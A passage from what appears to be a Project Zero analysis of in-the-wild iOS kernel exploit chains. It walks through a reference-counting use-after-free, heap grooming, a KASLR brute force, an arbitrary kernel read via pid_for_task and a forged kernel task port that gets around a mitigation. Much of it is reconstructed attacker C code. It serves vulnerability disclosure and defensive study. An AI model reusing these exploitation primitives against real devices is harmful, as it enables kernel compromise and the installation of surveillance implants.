The address field is again a pointer to a buffer, but this time rather than a size field there's a count field which specifies the number of mach port names contained in the buffer. When the kernel processes this descriptor (in the function ipc_kmsg_copyin_ool_ports_descriptor in ipc_kmsg.c) it will look up each of the names in the out-of-line ports buffer, take a reference on the underlying ipc_port structure and place that reference-carrying pointer in a kalloc'ed kernel buffer which reflects the layout of the out-of-line ports buffer. Since a port name in userspace is 32-bits and the iOS kernel is 64-bit (at least for all devices supported by this exploit) the size of the kalloc kernel buffer will be double the size of the out-of-line ports descriptor (since each 32-bit name will become a 64-bit pointer.)

They then call external method 17 (s_set_surface_notify) once, passing target_port_1 as the wake_port argument.

Understanding reference counting bugs means matching up references with pointers and understanding their lifetimes. To work out what's going on here we need to enumerate all the pointers to the target port and see what's holding references. Here's a diagram showing the three reference-holding pointers to target_port_1 at this point:

At this point there are three reference-holding pointers to target_port_1:
  • Pointer A is the entry in the renderer process's mach port names table (task->itk_space->it_table.)
  • Pointer B is in the out-of-line ports buffer of the message which is currently in transit. Note that the exploit sent this message to a port for which it owns the receive right, meaning that it can still receive this right by receiving the message.
  • Pointer C is held by the IOSurfaceRootUserClient. There's no bug the first time the s_set_surface_notify external method is called, so the userclient does correctly hold one reference for the one pointer it has.
Triggering the bug

They then call external method 17 again with the same arguments. As discussed earlier, this will cause an extra reference to be dropped on target_port_1, meaning there will still be three reference-holding pointers A, B and C but the io_references field of target_port_1 will be 2.

They then destroy the userclient, which drops its reference on target_port_1.

This means pointer C and one reference are gone, leaving pointers A and B and a reference count of one. The attackers then proceed as follows:

They destroy all the ports in ports_3:
Then they destroy the port to which the message with the out-of-line ports descriptor was sent. Since this will also destroy all the messages enqueued in the port's message queue, this will destroy pointer B and drop one more reference:
The reference count will go from one to zero, meaning that the target_port_1 allocation will be freed back to the ipc_ports zone. But pointer A can still be used, and will now point to a free'd allocation in the ipc_ports zone chunk.
Finally they destroy ports_4, hopefully leaving the entire chunk which contained target_port_1 empty (but with pointer A still usable as a dangling ipc_port pointer.) 
At this point the zone chunk previously containing target_port_1 should be completely empty and the mach_zone_force_gc() MIG method is called to reclaim the pages, making them available to be reused by all zones.
Note here that the exploit is making the assumption that only ports from ports_3, target_port_1 and ports_4 fill the target ipc_ports zone chunk. If that's not the case, because for example another task allocated a port while the exploit was trying to fill ports_3 and ports_4, then the exploit will fail because the chunk will not be garbage collected by mach_zone_force_gc(). target_port_1 will therefore continue to point to a free'd ipc_port, most likely leading to a kernel panic later on.

The exploit will now try to perform a "zone transfer" operation, aiming to get the memory which the dangling pointer A points to in to a different zone. Specifically, they are going to target kalloc.4096. This explains why they made a large number of kalloc.4096 allocations earlier (to fill in any holes in the zone.)

They send a large number of mach messages with out-of-line ports descriptors to some of the ports they allocated at the start of the exploit.

The descriptors each have 512 port names, meaning the kernel will allocate a 4096 byte buffer (512 ports * 8 bytes per pointer) and the port names alternate between MACH_PORT_NULL and target_port_2 in such a way that the address of target_port_2 will overlap with the ip_context fields of the dangling ipc_port.
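The arithmetic behind this layout can be sketched in C. The offsets 0x90 (ip_context) and 0xA8 (size of struct ipc_port) are the ones that appear in the attackers' replacer-building function in this post; the assumption that ports are packed from offset 0 of the page, and all the toy_ names, are mine.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TOY_PAGE_SIZE      4096u
#define TOY_PORT_SIZE      0xA8u  /* sizeof(struct ipc_port) used in this post */
#define TOY_CONTEXT_OFFSET 0x90u  /* offset of ip_context used in this post */
#define TOY_NAME_COUNT     512u

/* Fill `names` so that, once each 32-bit name has been expanded into a
 * 64-bit pointer slot, the target's slot lands on every ip_context position
 * on the page (assuming ports are packed from page offset 0).
 * Returns how many slots were set. */
size_t toy_build_ool_names(uint32_t names[TOY_NAME_COUNT], uint32_t target_name)
{
    size_t set = 0;
    memset(names, 0, TOY_NAME_COUNT * sizeof(uint32_t)); /* 0 == MACH_PORT_NULL */
    for (uint32_t off = TOY_CONTEXT_OFFSET;
         off + 8 <= TOY_PAGE_SIZE;
         off += TOY_PORT_SIZE) {
        names[off / 8] = target_name;  /* index of the 8-byte slot at `off` */
        set++;
    }
    return set;
}

/* Size of the kernel-side buffer for `count` names on a 64-bit kernel. */
size_t toy_kernel_ool_size(size_t count)
{
    return count * sizeof(uint64_t);
}
```

Under these assumptions 512 names become a 4096 byte kernel buffer, and 24 of the slots (indices 18, 39, 60 and so on) would carry the target port's name.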

This is a (now) well known technique for creating fake kernel objects from out-of-line ports descriptors.

They send a very large number of these descriptors; hoping that one of them will replace the memory previously occupied by target_port_1. They then try to read the context value of the dangling target_port_1 (which will use pointer A.)

  mach_port_get_context(mach_task_self(), port_to_test, &context_val);
This works because the kernel code for mach_port_get_context is very simple; it doesn't take a reference on the port, only holds a lock, reads the ip_context field and returns. So it can work even with the very sparsely populated replacement objects built from out-of-line ports descriptors.

If the memory which used to contain target_port_1 did get replaced by one of the out-of-line ports descriptors, then the value read by mach_port_get_context will be a pointer to target_port_2, meaning they have disclosed where target_port_2 is in memory.

One of the requirements for each of the remaining exploits in the chain is to have known data at a known location; they have now solved this problem for this chain.

Rinse and repeat

Now they know where target_port_2 is in memory, they trigger the vulnerability a second time to get a second dangling port pointer, this time to target_port_2.

They start by destroying all the ports to which the replacer out-of-line ports descriptors were sent, which frees them all to the kalloc.4096 freelist. They then quickly make 12800 kalloc.4096 allocations via out-of-line memory descriptors so that the memory which target_port_1 points to doesn't get reused for an uncontrolled allocation.

They now perform the same operation as before to get a dangling pointer to target_port_2: sending it to themselves in an out-of-line ports descriptor, triggering the bug via IOSurfaceRootUserClient external method 17 then closing the userclient and destroying the surrounding ports (this time the ports_5 and ports_6 arrays.)

The second time around however they use a different replacement object; now they're trying to replace with out-of-line memory descriptors rather than out-of-line ports.

char replacer_buf[4096] = {0};
do {
  loop_iter = 0;
  for (int nn = 0; nn < 20; nn++) {
    build_replacer_ool_mem_region(replacer_buf,
                                  (loop_iter << 12) + (port_context_tag << 32));
    send_kalloc_reserver(second_ports[loop_iter++],
                         4096,
                         &replacer_buf[24],
                         1024, // 4MB each message
                         1);
  }
  mach_port_get_context(mach_task_self(),
                        second_target_port,
                        &raw_addr_of_second_target_port);
} while(HIDWORD(raw_addr_of_second_target_port) != port_context_tag );

void
build_replacer_ool_mem_region(char* buf,
                              uint64_t context_val)
{
  offset = 0x90; // initial value is offset of ip_context field
  for (int i = 0; i < constant_based_on_memsize; i++) {
    *(uint64_t*)(buf + (offset & 0xfff)) = context_val + (offset & 0xFFF);
    offset += 0xA8; // sizeof(struct ipc_port);
  }
}
They are trying to fill with fake ports in out-of-line memory descriptors; again only focusing on the context field. This time they pack three separate values in to the fake context field:

0-11: offset of this context field in the replacer page
12-31: loop_iteration (index into second_ports array for the port to which the kalloc_replacer was sent)
32-63: 0x1122 - a magic value to detect whether this is a replaced port
Each time through the loop they make 20480 kalloc.4096 allocations, hoping that one of them replaces the memory which previously contained target_port_2. They read the context value of target_port_2 via mach_port_get_context() and check whether the upper 32-bits match the 0x1122 magic value.

From the context value they know to which of the second_ports the kalloc replacer message which overlaps target_port_2 was sent (bits 12-31), and from bits 0-11 they also know the offset on the page of the replacer port.
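The three-field layout is easy to get wrong, so here is a small sketch of packing and unpacking such a context value. The struct and function names are hypothetical; only the bit ranges and the 0x1122 magic come from the description above.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint32_t page_offset;  /* bits 0-11: offset of the context field on the page */
    uint32_t index;        /* bits 12-31: index of the port the message went to */
    uint32_t magic;        /* bits 32-63: tag marking a replaced port */
} toy_context;

/* Pack the three fields into one 64-bit context value. */
uint64_t toy_pack_context(toy_context c)
{
    return ((uint64_t)c.magic << 32) |
           ((uint64_t)(c.index & 0xFFFFFu) << 12) |
           (uint64_t)(c.page_offset & 0xFFFu);
}

/* Split a 64-bit context value back into its three fields. */
toy_context toy_unpack_context(uint64_t raw)
{
    toy_context c;
    c.page_offset = (uint32_t)(raw & 0xFFFu);
    c.index       = (uint32_t)((raw >> 12) & 0xFFFFFu);
    c.magic       = (uint32_t)(raw >> 32);
    return c;
}
```

Checking the unpacked magic against the expected tag is the equivalent of the HIDWORD comparison in the attackers' loop.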

They free the port to which the kalloc replacer was sent, which will also free another 1023 kalloc.4096 allocations which didn't overlap.

Yet again there is another window here where a different process on the system could reallocate the target memory buffer, causing the exploit to crash.

pipes

Now in a loop they write a 4095 byte buffer to the write ends of the 0x800 pipes which were allocated earlier. The pipe code will make a kalloc.4096 allocation to hold the contents of the pipe. This may not seem any different to replacing with the mach message out-of-line memory buffers, but there's a fundamental difference: the pipe buffer is mutable. By reading the complete contents of the pipe buffer (emptying the pipe) and then writing the exact same amount of replacement bytes back (refilling the pipe buffer) it's possible to change the contents of the backing kalloc allocation without it being free'd and reallocated, as would be the case with mach message OOL memory buffers.
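The drain-and-refill pattern itself is ordinary POSIX and can be shown from userspace. The sketch below only demonstrates the API-level behaviour (the same pipe ends up holding different bytes of the same length); whether the kernel keeps the same backing allocation is the claim made above about XNU and is not something this code can show. The function names are my own.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

#define TOY_FILL_SIZE 0xFFF  /* 4095 bytes, as in the text */

/* Drain exactly TOY_FILL_SIZE bytes from the pipe, then write new contents
 * of the same length. Returns 0 on success, -1 on any failed or short I/O. */
int toy_pipe_replace(int read_fd, int write_fd, const char *new_contents)
{
    char scratch[TOY_FILL_SIZE];
    size_t got = 0;
    while (got < sizeof(scratch)) {
        ssize_t n = read(read_fd, scratch + got, sizeof(scratch) - got);
        if (n <= 0)
            return -1;
        got += (size_t)n;
    }
    if (write(write_fd, new_contents, TOY_FILL_SIZE) != TOY_FILL_SIZE)
        return -1;
    return 0;
}

/* Fill a fresh pipe with 'A's, swap the contents for 'B's and read them
 * back. Returns 1 if the pipe then holds exactly the 'B' buffer, else 0. */
int toy_pipe_demo(void)
{
    int fds[2];
    char buf[TOY_FILL_SIZE];
    char out[TOY_FILL_SIZE];
    int ok = 0;

    if (pipe(fds) != 0)
        return 0;
    memset(buf, 'A', sizeof(buf));
    if (write(fds[1], buf, sizeof(buf)) == (ssize_t)sizeof(buf)) {
        memset(buf, 'B', sizeof(buf));
        if (toy_pipe_replace(fds[0], fds[1], buf) == 0) {
            memset(out, 0, sizeof(out));
            ssize_t n = read(fds[0], out, sizeof(out));
            ok = (n == (ssize_t)sizeof(out)) &&
                 (memcmp(out, buf, sizeof(out)) == 0);
        }
    }
    close(fds[0]);
    close(fds[1]);
    return ok;
}
```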

You might ask, why not just directly replace with pipes, rather than first OOL memory, then pipes? The reason is that pipe backing buffers have their own relatively low allocation size limits (16MB) whereas in-transit OOL memory is only limited by available zone allocator memory. As the attackers refine their exploit chain in later posts, they will actually remove the intermediate OOL step.

They use the same function as before to build the contents of the pipe buffer which will replace the port, but use a different tag magic value, and set bits 12-31 to be the index of the pipe in the pipe_fd's array:

  replacer_pipe_index = 0;
  for (int i1 = 0; i1 < *n_pipes; i1++) {
    build_replacer_ool_mem_region(replacer_buf,
                                  (i1 << 12) + (port_context_tag << 33));
    write(pipe_fds[2 * i1 + 1], replacer_buf, 0xFFF);
  }
They read the ip_context value via mach_port_get_context from the second dangling port again and check that the context matches the new pipe replacer context. If it does, they've now succeeded in creating a fake ipc_port which is backed by a mutable pipe buffer. 
Defeating KASLR via clock_sleep_trap

In the same slide deck where Stefan Esser discusses the OOL ports descriptor technique he also discusses a technique to brute-force KASLR using fake mach ports. This trick was also used in the yalu102 jailbreak.

Here's the code for clock_sleep_trap. This is a mach trap, the mach equivalent of a BSD syscall.

/*
 * Sleep on a clock. System trap. User-level libmach clock_sleep
 * interface call takes a mach_timespec_t sleep_time argument which it
 * converts to sleep_sec and sleep_nsec arguments which are then
 * passed to clock_sleep_trap.
 */
kern_return_t
clock_sleep_trap(
  struct clock_sleep_trap_args *args)
{
  mach_port_name_t clock_name        = args->clock_name;
  sleep_type_t sleep_type            = args->sleep_type;
  int sleep_sec                      = args->sleep_sec;
  int sleep_nsec                     = args->sleep_nsec;
  mach_vm_address_t wakeup_time_addr = args->wakeup_time;
  clock_t clock;
  mach_timespec_t swtime             = {};
  kern_return_t rvalue;

  /*
   * Convert the trap parameters.
   */
  if (clock_name == MACH_PORT_NULL)
    clock = &clock_list[SYSTEM_CLOCK];
  else
    clock = port_name_to_clock(clock_name);

  swtime.tv_sec  = sleep_sec;
  swtime.tv_nsec = sleep_nsec;

  /*
   * Call the actual clock_sleep routine.
   */
  rvalue = clock_sleep_internal(clock, sleep_type, &swtime);

  /*
   * Return current time as wakeup time.
   */
  if (rvalue != KERN_INVALID_ARGUMENT && rvalue != KERN_FAILURE) {
    copyout((char *)&swtime, wakeup_time_addr, sizeof(mach_timespec_t));
  }
  return (rvalue);
}

clock_t
port_name_to_clock(mach_port_name_t clock_name)
{
  clock_t     clock = CLOCK_NULL;
  ipc_space_t space;
  ipc_port_t port;

  if (clock_name == 0)
    return (clock);
  space = current_space();
  if (ipc_port_translate_send(space, clock_name, &port) != KERN_SUCCESS)
    return (clock);
  if (ip_active(port) && (ip_kotype(port) == IKOT_CLOCK))
    clock = (clock_t) port->ip_kobject;
  ip_unlock(port);
  return (clock);
}

static kern_return_t
clock_sleep_internal(clock_t clock,
                     sleep_type_t sleep_type,
                     mach_timespec_t* sleep_time)
{
  ...
  if (clock == CLOCK_NULL)
    return (KERN_INVALID_ARGUMENT);

  if (clock != &clock_list[SYSTEM_CLOCK])
    return (KERN_FAILURE);
  ...

/*
 * List of clock devices.
 */
SECURITY_READ_ONLY_LATE(struct clock) clock_list[] = {

  /* SYSTEM_CLOCK */
  { &sysclk_ops, 0, 0 },

  /* CALENDAR_CLOCK */
  { &calend_ops, 0, 0 }
};
The trick works like this: They pass the fake port's name as the clock_name argument to the trap. This name gets passed to port_name_to_clock, which verifies that the io_bits' KOTYPE field of the struct ipc_port is IKOT_CLOCK then returns the ip_kobject field, which is the pointer value at offset +0x68 in the fake port. That pointer is passed as the first argument to clock_sleep_internal, where it's compared against &clock_list[SYSTEM_CLOCK]:

  if (clock != &clock_list[SYSTEM_CLOCK])
    return (KERN_FAILURE);
The insight in to the trick is two-fold: firstly, that the clock_list array resides in the kernel DATA segment and has the same KASLR slide applied to it as the rest of the kernel. Secondly, the only way that clock_sleep_trap can return KERN_FAILURE is if this comparison fails. All other error paths return different error codes.

Putting these two observations together it's possible to brute force KASLR. For the versions of iOS targeted by this exploit there were only 256 possible KASLR slides. The attackers create a fake IKOT_CLOCK port and set its ip_kobject field to each of the possible addresses of the system clock in the clock_list array in turn. After each guess they call the clock_sleep_trap mach trap; the guess was correct when the return value isn't KERN_FAILURE.

Here's their code which does that:

int current_slide_index = 0;
char buf[0x1000];

while (current_slide_index < 256) {
  // empty the pipe
  read(pipe_fds[2 * replacer_pipe_index],
       buf,
       0x1000uLL);

  // build a fake clock port
  memset(buf, 0, 0x1000);
  char* fake_port = &buf[offset_of_second_port_on_page];
  *(uint32_t*)(fake_port+0x00) = 0x80000019;      // IO_ACTIVE | IKOT_CLOCK
  *(uint32_t*)(fake_port+0x08) = 10;              // io_refs
  // ip_kobject
  *(uint64_t*)(fake_port+0x68) = system_clock_kaddr_unslid + (current_slide_index << 21);
  *(uint32_t*)(fake_port+0xa0) = 10;              // msg count

  // refill the pipe
  write(pipe_fds[(2 * replacer_pipe_index) + 1],
        buf,
        0xfff);

  if ( !(unsigned int)clock_sleep_trap(second_target_port, 0, 0, 0, 0)) {
    // found it!
    kernel_base = 0xfffffff007004000 + (current_slide_index << 21);
    break;
  }

  // try the next candidate slide
  current_slide_index++;
}
This same trick and code is used in iOS Exploit Chains 2, 3 and 4.
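The search logic can be checked in isolation with a small simulation. Nothing here touches a kernel: toy_clock_sleep_trap is a stand-in that returns KERN_FAILURE (5 in the Mach headers) unless the guessed pointer matches, and TOY_CLOCK_UNSLID is a made-up address, not a real offset. The 256 candidates and the 1 << 21 step are taken from the attackers' code above.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_KERN_SUCCESS 0
#define TOY_KERN_FAILURE 5

#define TOY_SLIDE_STEP  (1ull << 21)
#define TOY_SLIDE_COUNT 256u

/* Hypothetical unslid address of clock_list[SYSTEM_CLOCK]; not a real offset. */
#define TOY_CLOCK_UNSLID 0xfffffff007600000ull

/* Stand-in for the trap: fails with KERN_FAILURE unless the supplied
 * ip_kobject value equals the (secret) slid address of the system clock. */
int toy_clock_sleep_trap(uint64_t fake_kobject, unsigned secret_slide_index)
{
    uint64_t real = TOY_CLOCK_UNSLID + secret_slide_index * TOY_SLIDE_STEP;
    return (fake_kobject == real) ? TOY_KERN_SUCCESS : TOY_KERN_FAILURE;
}

/* Try every candidate slide in turn. Returns the matching index,
 * or -1 if no candidate matched. */
int toy_find_slide(unsigned secret_slide_index)
{
    for (unsigned i = 0; i < TOY_SLIDE_COUNT; i++) {
        uint64_t guess = TOY_CLOCK_UNSLID + i * TOY_SLIDE_STEP;
        if (toy_clock_sleep_trap(guess, secret_slide_index) != TOY_KERN_FAILURE)
            return (int)i;
    }
    return -1;
}
```

The design point worth noting is that the oracle is a single distinguishable return code, so at most 256 trap calls are needed.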
kernel read and write

In iOS Exploit Chain 1 we were introduced to the kernel task port; a port which granted, by design, kernel memory read and write access to anyone who had a send right to it. Using a memory corruption vulnerability the attackers were able to gain a send right to the real kernel task port, thereby very easily gaining the ability to modify kernel memory.

In iOS 10.3 a mitigation was introduced intended to prevent the kernel task port from being used by any userspace processes.

In convert_port_to_task, which will be called to convert a task port to the underlying struct task pointer, the following code was added:

  if (task == kernel_task && current_task() != kernel_task) {
    ip_unlock(port);
    return TASK_NULL;
  }
This mitigation is easily bypassed by the attacker. By simply making a copy of the kernel task structure at a different kernel address the pointer comparison against kernel_task will fail and kernel memory read-write access will continue to work.
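Why an address comparison is not enough can be shown with a toy model. The toy_task type and all function names below are hypothetical; the check has the same shape as the one quoted above, comparing a pointer against the address of the one real kernel task.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef struct {
    int  refs;
    char body[32];  /* stand-in for the remaining task fields */
} toy_task;

toy_task toy_kernel_task_storage = { 1, "kernel" };
toy_task *const toy_kernel_task = &toy_kernel_task_storage;

/* Same shape as the added check: reject the kernel task by address when
 * the caller is not the kernel task itself. */
toy_task *toy_convert_port_to_task(toy_task *task, const toy_task *caller)
{
    if (task == toy_kernel_task && caller != toy_kernel_task)
        return NULL;
    return task;
}

/* Returns 1 if a byte-for-byte copy at a different address passes the
 * check that the original fails, 0 otherwise. */
int toy_copy_bypasses_check(void)
{
    toy_task user = { 1, "user" };
    toy_task copy;
    memcpy(&copy, toy_kernel_task, sizeof(copy));

    int original_blocked =
        toy_convert_port_to_task(toy_kernel_task, &user) == NULL;
    int copy_allowed =
        toy_convert_port_to_task(&copy, &user) == &copy;
    return original_blocked && copy_allowed;
}
```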

The prerequisite for this bypass is being able to read enough fields of the real kernel task structure in order to make a fake copy. For this they use the pid_for_task trick. I first used this trick after seeing it used in the yalu102 jailbreak; Stefan Esser claims to have been teaching it in his iOS exploitation classes since at least iOS 9.

pid_for_task

The prerequisites for this trick are the ability to craft a fake ipc_port structure and to be able to put controlled data at a known address. Given those two primitives it yields the ability to read a 32-bit value at an arbitrary, controlled address.

The trick is to build a fake task port (KOTYPE=IKOT_TASK) but instead of targeting the fields used by the mach_vm_read/write methods, target instead the pid_for_task trap. Here's the code for that trap circa iOS 10.3:

kern_return_t
pid_for_task(struct pid_for_task_args *args)
{
  mach_port_name_t t = args->t;
  user_addr_t pid_addr  = args->pid;
  ...
  t1 = port_name_to_task(t);
  ...
  p = get_bsdtask_info(t1);
  if (p) {
    pid  = proc_pid(p);
  ...
  (void) copyout((char *) &pid, pid_addr, sizeof(int));
  ...
}
port_name_to_task will verify the KOTYPE field is IKOT_TASK then return the ip_kobject field. get_bsdtask_info returns the bsd_info field of the struct task:

void *
get_bsdtask_info(task_t t)
{
  return(t->bsd_info);
}
and proc_pid returns the p_pid field of struct proc:

int
proc_pid(proc_t p)
{
  if (p != NULL)
    return (p->p_pid);
  ...
}
In all the versions of iOS supported by this exploit the bsd_info field of struct task was at offset +0x360, and the p_pid field of struct proc was at offset +0x10.

Therefore, by pointing the ip_kobject field to controlled memory, then at offset 0x360 from there writing a pointer which points 0x10 bytes below the 32-bit value you wish to read it's possible to build a fake task port which will return a 32-bit value read from an arbitrary address when passed to the pid_for_task trap.

Here's their code setting that up:

uint32_t
slow_kread_32(uint64_t kaddr,
              mach_port_name_t dangling_port,
              int *pipe_fds,
              int offset_on_page_to_fake_port,
              uint64_t pipe_buffer_kaddr)
{
  char buf[0x1000] = {0};

  // empty pipe buffer
  read(pipe_fds[0],
       buf,
       0x1000);

  // build the fake task struct on the opposite side of the page
  // to the fake port
  // (the declaration and the default of 0 are assumed; the original
  // listing only shows the override below)
  int offset_on_page_to_fake_task = 0;
  if ( offset_on_page_to_fake_port < 1792 )
    offset_on_page_to_fake_task = 2048;

  // build the fake task port:
  char* fake_port = &buf[offset_on_page_to_fake_port];
  *(uint32_t*)(fake_port+0x00) = 0x80000002; // IO_ACTIVE | IKOT_TASK
  *(uint32_t*)(fake_port+0x08) = 10; // io_refs
  // ip_kobject
  *(uint64_t*)(fake_port+0x68) = pipe_buffer_kaddr + offset_on_page_to_fake_task;

  char* fake_task = &buf[offset_on_page_to_fake_task];
  *(uint32_t*)(fake_task + 0x10)  = 10; // task refs
  *(uint64_t*)(fake_task + 0x360) = kaddr - 0x10; // 0x10 below target kaddr

  // refill pipe buffer
  write(pipe_fds[1],
        buf,
        0xfff);

  pid_t pid = 0;
  pid_for_task(dangling_port, &pid);
  return (uint32_t)pid;
}
This technique will be used in all the subsequent exploit chains as an initial bootstrap kernel memory read function.
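The pointer arithmetic behind the trick can be modelled with a flat byte array standing in for kernel memory. Everything prefixed toy_ is hypothetical and "addresses" are just indices into the array; the two offsets (0x360 for bsd_info and 0x10 for p_pid) are the ones given in the text for these iOS versions.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOY_BSD_INFO_OFFSET 0x360u  /* task->bsd_info, per the text */
#define TOY_P_PID_OFFSET    0x10u   /* proc->p_pid, per the text */
#define TOY_MEM_SIZE        0x2000u

/* Flat byte array standing in for kernel memory; addresses are indices. */
uint8_t toy_mem[TOY_MEM_SIZE];

uint64_t toy_load64(uint64_t addr)
{
    uint64_t v;
    memcpy(&v, &toy_mem[addr], sizeof(v));
    return v;
}

uint32_t toy_load32(uint64_t addr)
{
    uint32_t v;
    memcpy(&v, &toy_mem[addr], sizeof(v));
    return v;
}

void toy_store64(uint64_t addr, uint64_t v)
{
    memcpy(&toy_mem[addr], &v, sizeof(v));
}

void toy_store32(uint64_t addr, uint32_t v)
{
    memcpy(&toy_mem[addr], &v, sizeof(v));
}

/* What the trap does with the task pointer it obtained from ip_kobject:
 * follow bsd_info, then return the p_pid field of that proc. */
uint32_t toy_pid_for_task(uint64_t task_addr)
{
    uint64_t proc_addr = toy_load64(task_addr + TOY_BSD_INFO_OFFSET);
    return toy_load32(proc_addr + TOY_P_PID_OFFSET);
}

/* Read 32 bits at `target` by planting a fake task at `fake_task_addr`
 * whose bsd_info points 0x10 bytes below the target. */
uint32_t toy_kread32(uint64_t fake_task_addr, uint64_t target)
{
    toy_store64(fake_task_addr + TOY_BSD_INFO_OFFSET,
                target - TOY_P_PID_OFFSET);
    return toy_pid_for_task(fake_task_addr);
}
```

The subtraction of 0x10 cancels the offset the trap adds when it reads p_pid, so the value returned as a "pid" is whatever 32 bits sit at the target address.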
kernel memory write

They first read a 32-bit value at the base of the kernel image. They are able to do this because they determined the KASLR slide, so by adding that to the unslid, hardcoded kernel image load address (0xfffffff007004000) they can determine the runtime base address of the kernel image. This read is presumably left over from testing however, as they don't do anything with the value which is read.
Using the offsets for this device and kernel version they read the address of the pointer to the kernel_task in the DATA segment, then read the entire task structure:

  for (int i3 = 0; i3 < 0x180; i3++) {
    val = slow_kread_32(
            kernel_task_address_runtime + 4 * i3,
            second_target_port,
            &pipe_fds[2 * replacer_pipe_index],
            second_dangler_port_offset_on_page,
            page_base_of_second_target_port);
    *(_DWORD *)&fake_kernel_task[4 * i3] = val;
  }
They read the pointer at +0xe8 in the task struct, which is itk_sself, a pointer to the real kernel task port. They then read out the contents of the whole real kernel task port:

  memset(fake_kernel_task_port, 0, 0x100);
  for ( i4 = 0; i4 < 64; ++i4 ) {
    v17 = slow_kread_32(
            kernel_task_port_address_runtime + 4 * i4,
            second_target_port,
            &pipe_fds[2 * replacer_pipe_index],
            second_dangler_port_offset_on_page,
            page_base_of_second_target_port);
    *(_DWORD *)&fake_kernel_task_port[4 * i4] = v17;
  }
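Both loops follow the same pattern: copy a structure out of kernel memory one 32-bit word at a time using whatever read primitive is available. A generic sketch of that pattern is below; the callback type and the buffer-backed reader are hypothetical test doubles, not part of the exploit. Note the sizes line up: 0x180 words is 0x600 bytes for the task, and 64 words is 0x100 bytes for the port.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* A 32-bit read primitive: returns the word at `addr`. */
typedef uint32_t (*toy_read32_fn)(uint64_t addr, void *ctx);

/* Copy n_words consecutive 32-bit words starting at `addr` into `out`,
 * which must have room for 4 * n_words bytes. */
void toy_read_words(toy_read32_fn read32, void *ctx,
                    uint64_t addr, uint8_t *out, size_t n_words)
{
    for (size_t i = 0; i < n_words; i++) {
        uint32_t v = read32(addr + 4 * i, ctx);
        memcpy(out + 4 * i, &v, sizeof(v));
    }
}

/* Test double: treats ctx as a byte buffer and addr as an index into it. */
uint32_t toy_buffer_read32(uint64_t addr, void *ctx)
{
    uint32_t v;
    memcpy(&v, (const uint8_t *)ctx + addr, sizeof(v));
    return v;
}
```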
They make three changes to their copy of the kernel task port:

  // increase the reference count:
  *(_DWORD *)&fake_kernel_task_port[4] = 0x2000;

  // point the ip_kobject pointer into the pipe buffer
  *(_QWORD *)&fake_kernel_task_port[0x68] = page_base_of_second_target_port + offset;

  // increase the sorights
  *(_DWORD *)&fake_kernel_task_port[0xA0] = 0x2000;
They then copy that in to the buffer which will be written to the pipe at the offset of the dangling port:

  memset(replacer_page_contents, 0, 0x1000uLL);
  memcpy(&replacer_page_contents[second_dangler_port_offset_on_page],
         fake_kernel_task_port,
         0xA8);
Then, to the half of the page which doesn't contain the port they write the fake kernel task:

  memcpy(&replacer_page_contents[other_side_index], fake_kernel_task, 0x600);

They write that back over the port (via the pipe buffer), creating a fake kernel task port which bypasses the kernel task port mitigation.
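The three changes to the copied port can be collected into one helper. This is only a sketch: the offsets (0x4, 0x68, 0xA0) and the value 0x2000 are the ones quoted above for this device and kernel version, while the function and constant names are my own:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum {
    PORT_COPY_SIZE  = 0x100, /* size of the copied port buffer, per the text */
    OFF_REFERENCES  = 0x04,  /* reference count                              */
    OFF_IP_KOBJECT  = 0x68,  /* ip_kobject pointer                           */
    OFF_IP_SORIGHTS = 0xA0   /* send-once rights count                       */
};

/* Apply the three edits to a copy of the real kernel task port. */
static void patch_port_copy(uint8_t *port_copy, uint64_t fake_task_kaddr) {
    const uint32_t big_count = 0x2000;
    assert(port_copy != NULL);
    memcpy(&port_copy[OFF_REFERENCES], &big_count, sizeof(big_count));
    memcpy(&port_copy[OFF_IP_KOBJECT], &fake_task_kaddr, sizeof(fake_task_kaddr));
    memcpy(&port_copy[OFF_IP_SORIGHTS], &big_count, sizeof(big_count));
}
```

Everything else in the buffer is left exactly as it was read from the real port, which is presumably the point: the fake port looks like the genuine one apart from where its ip_kobject points.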

All of the subsequent kernel exploits in this series reuse this technique.
Post exploitation
Having gained kernel memory read/write access, they proceed as in iOS Exploit Chain 2 by finding the ucreds of launchd in order to unsandbox the current process. Their code has improved a little and they now restore the current process's original ucreds after spawning the implant.
Again they first have to patch the platform policy bytecode and add the hash of the implant to the trust cache.

The only major post-exploitation difference to the previous chain is that they now mark the device as having been successfully exploited. They check for the mark early during their kernel exploit and bail out if the exploit has already run.

Specifically they overwrite the boot arguments, passed by iBoot to the booting XNU kernel. This string can be read from inside the MobileSafari renderer sandbox. They add the string "iopl" to the bootargs, and at the start of the kernel exploit they read the bootargs and check for this string. If they find it, then this device has already been compromised and they don't need to continue with the exploit.
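The check itself amounts to a substring search over the bootargs string. A minimal sketch, assuming the string has already been read into a C string (how it is read is not shown here); already_exploited and EXPLOITED_MARKER are names I've made up for illustration:

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

#define EXPLOITED_MARKER "iopl"

/* Returns true if the marker string appears anywhere in the bootargs. */
static bool already_exploited(const char *bootargs) {
    assert(bootargs != NULL);
    return strstr(bootargs, EXPLOITED_MARKER) != NULL;
}
```

Note that a plain substring match like this would also fire on any unrelated boot argument which happened to contain "iopl".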

After posix_spawn'ing the implant binary they sleep for 1/10th of a second, reset their ucreds, drop their send right to the fake kernel task port, ping a server to report that they launched the implant and go into an infinite sleep.

In-the-wild iOS Exploit Chain 4

30 August, 2019 - 02:04
Posted by Ian Beer, Project Zero

This exploit chain supported iOS 12-12.1, although the two vulnerabilities were unpatched when we discovered the chain in the wild. It was these two vulnerabilities which we reported to Apple with a 7-day deadline, leading to the release of iOS 12.1.4.

The sandbox escape vulnerability again involves XPC, though this time it's a particular daemon incorrectly managing the lifetime of an XPC object.  

It's the kernel bug used here which is, unfortunately, easy to find and exploit (if you don’t believe me, feel free to seek a second opinion!). It's an IOKit device driver with an external method which, in its very first statement, performs an unbounded memmove with a length argument directly controlled by the attacker:

IOReturn
ProvInfoIOKitUserClient::ucEncryptSUInfo(char* struct_in,
                                         char* struct_out){
  memmove(&struct_out[4],
          &struct_in[4],
          *(uint32_t*)&struct_in[0x7d4]);
...
The contents of the struct_in buffer are completely attacker-controlled.

